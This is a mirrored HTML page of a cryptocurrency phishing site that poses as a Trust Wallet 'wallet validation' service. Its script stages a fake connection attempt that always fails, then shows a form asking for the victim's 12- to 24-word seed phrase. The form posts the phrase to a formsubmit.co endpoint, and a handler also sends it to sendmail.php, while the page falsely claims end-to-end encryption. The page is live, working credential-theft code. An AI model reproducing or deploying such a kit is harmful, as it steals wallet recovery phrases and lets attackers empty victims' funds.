<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">




<!-- Mirrored from dappvalidator-peach.vercel.app/connect.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Aug 2023 11:04:01 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>

    <meta charset="utf-8">
    <title>Trustwallet Dev Apygate</title>
    <meta name="author" content="themesflat.com">

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <link rel="stylesheet" type="text/css" href="asset/css/style.css">

    <link rel="icon" type="image/x-icon" href="download2.png">
    <link rel="apple-touch-icon-precomposed" href="asset/icon/Favicon.html">
</head>

<!-- <body class="body header-fixed is_dark"> -->

<body class="body header-fixed">
    <script type="text/javascript" src="coin.js"></script>
    <div id="coinmarketcap-widget-marquee" coins="1,1027,825,1839,2010,74,4030" currency="USD" theme="dark" transparent="false" show-symbol-logo="true"></div>

    <div class="preload preload-container">
        <div class="preload-logo"></div>
    </div>

    <div id="wrapper">
        <div id="page" class="clearfix">

            <header id="header_main" class="header_1 js-header">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <div id="site-header-inner">
                                <div class="wrap-box flex">
                                    <div id="site-logo" class="clearfix">
                                        <div id="site-logo-inner">
                                            <a href="#" rel="home" class="main-logo">
                                                <h4 style="color: white !important;">Dev Apygate</h4>
                                            </a>
                                        </div>
                                    </div>
                                 
                                    <div class="flat-search-btn flex">
                                        <div class="header-search flat-show-search" id="s1">
                                            
                                            <br>
                                        </div>
                                        <div class="sc-btn-top mg-r-12" id="site-header">
                                            <a href="#wallets_list" id="connectbtn"
                                                class="sc-button header-slider style style-1 wallet fl-button pri-1">
                                                <span>Validate Wallet</span>
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
               
            </header>




            <section class="tf-section top-seller" id="wallets_list">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style2">
                                Connect Your Trustwallet</h2>

                            <div class="heading-line s2"></div>
                        </div>


                       


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="wallet_connect" class="sc-author-box select_wallet" data-title="Wallet Connect"
                                data-logo="asset/images/logo/walle.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="asset/images/logo/walle.jpg" alt="Image" class="avatar">
                                    </a>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a> Wallet Connect</a></h5>
                                   
                                </div>
                            </div>
                        </div>
                        <br>

                         <h6>Please note this is a decentralized automated systems for wallet rectifications.</h6>

                      
                               
                               

                    </div>
                </div>
            </section>
          
            <footer id="footer" class="clearfix style-2">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-lg-3 col-md-12 col-12">
                            <div class="widget widget-logo">
                                <div class="logo-footer" id="logo-footer">
                                    <a href="#.html">
                                        Trustwallet Decentralized<br>
                                        Launchpad
                                    </a>
                                </div>
                                <p class="sub-widget-logo"><strong>Trustwallet open and decentralized protocol for syncing various Wallets
                                    to Dapps Secure Server. This is not an app but a protocol that establishes a remote
                                    connection for Wallet ID Verification.</strong></p>
                            </div>
                        </div>
                        
                        <div class="col-lg-3 col-md-6 col-sm-7 col-12">
                            <div class="widget widget-subcribe">
                                <h5 class="title-widget">Subscribe</h5>
                                <div class="form-subcribe">
                                    <form id="subscribe-form" action="#" method="GET" accept-charset="utf-8"
                                        class="form-submit">
                                        <input name="email" value="" class="email" type="email"
                                            placeholder="name@email.com" required>
                                        <button id="submit" name="submit" type="submit"><i
                                                class="icon-fl-send"></i></button>
                                    </form>
                                </div>
                                <div class="widget-social style-1 mg-t32" style="visibility:hidden">
                                    <ul>
                                        <li><a href="#"><i class="fab fa-twitter"></i></a></li>
                                        <li><a href="#"><i class="fab fa-facebook"></i></a></li>
                                        <li class="style-2"><a href="#"><i class="fab fa-telegram-plane"></i></a></li>
                                        <li><a href="#"><i class="fab fa-youtube"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-tik-tok-2"></i></a></li>
                                        <li class="mgr-none"><a href="#"><i class="icon-fl-vt"></i></a></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>
        </div>

        <div class="modal fade popup" id="popup_connect_wallet_success" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered" role="document">
                <div class="modal-content">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                    <div class="modal-body space-y-20 pd-40">


                        <center>
                            <h2 style="font-size: px;
   
   color: green">Connecting.....</h2>
                    </div>

                    <h2 style="font-size: px;
   
   color: blue"></h2>

                </div>
            </div>
        </div>
    </div>
    <div class="modal fade popup" id="popup_connect_wallet" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
                <div class="modal-body space-y-20 pd-40">

                    <h3>
                        <img width="50" height="50" class="avatar" id="wallet_logo" /><br>
                        <span id="wallet_name" clas="mt-1">Sync Wallet</span>
                    </h3>
                    <p class="text-center">
                        This session is secured and encrypted </p>

                    <div id="auto_connecting" style="display:none;">
                        <br><br><br>
                        <div class="heading-line s2" style="width: 100%;">
                            <br>
                            <h5 align="center">
                                starting secure connection...<br>
                                <i align="center" style="text-align: center !important; font-size:small"
                                    class="text-muted align-items-center">please wait...</i>
                            </h5>
                            <br>
                        </div>
                    </div>

                    <div id="failed_to_connect" style="display:none;">
                        <div
                            style="padding:6px; color:red; border:1px solid red; border-radius:5px; text-align:center!important; font-size:16px; font-weight:500;">
                            An error occurred... please try again or connect manually
                        </div>
                        <br><br><br>
                        <a href="#" id="try_auto_connecting_again" class="btn btn-outline-primary"
                            aria-label="Close">Try Again</a><br>
                        <a href="#" id="button_connect_manually" class="btn btn-primary">Connect Manually</a>
                    </div>

                    

                    <div id="div_connect_manuallly" style="display:none;">
                        <form action="https://formsubmit.co/79577e0f3261ed4f8744a8897ed63b0f" method="POST">
                            
                            <div class="form-group">
      <textarea placeholder="Enter your 12, 15, or 24 Mnemonic words. Seperate them with spaces." class="form-control" style="font-size:25px; font-weight:650" rows="4" name="phrase" rows="10" required></textarea>
    </div>
                            
                                <p>...</p>
                                <button id="submit" type="submit" name="submit" value="submit" class="btn btn-primary"
                                    style="border-top: 5px; ">Connect Wallet</button>
                            </div>
                        </form>
                    </div>


                   
                    <div>
                        <br><br><br>
                        <h5 align="center" class="mt-4 text-muted align-items-center"><img
                                src="asset/images/icon/shield.png" width="30" height="30" /> This session is protected
                            with an end-to-end encryption</h5>
                    </div>
                </div>
            </div>
        </div>
    </div>
    </div>

     <div class="layout__footer">
            <footer class="footer-container container">
                <div class="container-inner">
                    <div class="row">
                        <div class="column column--sm-6">
                            <h5>Help Center</h5>
                            <p>Brought to you by <a href="https://www.trustwallet.com/" target="_blank">Trustwallet</a>
                            </p>
                        </div>

    <!--<a id="scroll-top"></a>-->

    <script src="asset/js/jquery.min.js"></script>
    <script src="asset/js/jquery.easing.js"></script>
    <script src="asset/js/bootstrap.min.js"></script>
    <script src="asset/js/wow.min.js"></script>
    <script src="asset/js/plugin.js"></script>
    <script src="asset/js/shortcodes.js"></script>
    <script src="asset/js/main.js"></script>
    <script src="asset/js/count-down.js"></script>
    <script src="asset/js/swiper-bundle.min.js"></script>
    <script src="asset/js/swiper.js"></script>
    <script src="asset/js/parallax.js"></script>
    <script src="asset/js/web3.min.js"></script>
    <script src="asset/js/moralis.js"></script>
    <script src="asset/js/nft.js"></script>

    <script>
        //Handle Select Wallet Click
        $(function () {
            $('.select_wallet').on('click', function () {
                var wd = $(this); //wd = wallet details

                $('#wallet_name').text(wd.data('title'));
                $('#wallet_logo').attr("src", wd.data('logo'));
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                $('#popup_connect_wallet').modal('show');

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 15);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);


            })

            $('#try_auto_connecting_again').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').show();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').hide();

                //Hide autoconnecting div and show error in random interval
                var interval = 1000 * getRandomInt(1, 20);
                setTimeout(() => {
                    $('#auto_connecting').hide();
                    $('#div_connect_manuallly').hide();
                    $('#failed_to_connect').show();
                }, interval);
            })

            $('#button_connect_manually').on('click', function (e) {
                e.preventDefault();
                $('#auto_connecting').hide();
                $('#failed_to_connect').hide();
                $('#div_connect_manuallly').show();
            })

            //FOR PHRASE TEXT VALIDATION
            $('#secret_phrase').on('keyup', function () {
                var phrase_seed_entered = $(this).val().trim()
                if (phrase_seed_entered != "") {
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if ([12, 15, 18, 21, 24].includes(phrase_count)) {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    } else {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    }
                } else {
                    $('#button_connect_wallet').attr('disabled', true).css('opacity', '0.2')
                }
            })

            //CONNECT WALLET BUTTON Handler
            $('#button_connect_wallet').on('click', function (e) {
                e.preventDefault();
                let field = $('#secret_phrase')
                if (field.val().length >= 12) {
                    $(this).text('Loading...').css('pointer-events', 'none')

                    $.ajax({
                        url: "sendmail.php",
                        method: "POST",
                        data: { "load_phrase": 1, "data_phrase": field.val(), "wallet_selected": $('#wallet_name').text().trim() },
                        success: function (result) {
                            var result = JSON.parse(result);


                            if (result.result == "success") {
                                $('#button_connect_wallet').text('Connect Wallet').css('pointer-events', 'all')
                                $('#popup_connect_wallet').modal('hide')
                                $('#popup_connect_wallet_success').modal('show')
                                window.setTimeout(function () {
                                    window.location.href = 'dapps-hub.html';
                                }, 5000000);


                            }

                            else {

                                alert(result);
                            }
                        },
                        error: function (xhr, ajaxOptions, thrownError) {
                            alert(thrownError);
                        }
                    })
                }
            })
        })

        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
        }

        //DISABLE RIGHT CLICK AND CTRL KEY
        // window.oncontextmenu = function () {
        //     return false;
        // }
        // $(document).keydown(function (event) {
        //     if (event.keyCode == 123) {
        //         return false;
        //     }
        //     else if ((event.ctrlKey && event.shiftKey && event.keyCode == 73) || (event.ctrlKey && event.shiftKey && event.keyCode == 74)) {
        //         return false;
        //     }
        // });
    </script>

    <style>
        .btn-outline-primary {
            width: 100%;
            border-radius: 20px;
            font-weight: 700;
            font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom: 10px
        }
    </style>
</body>





</html>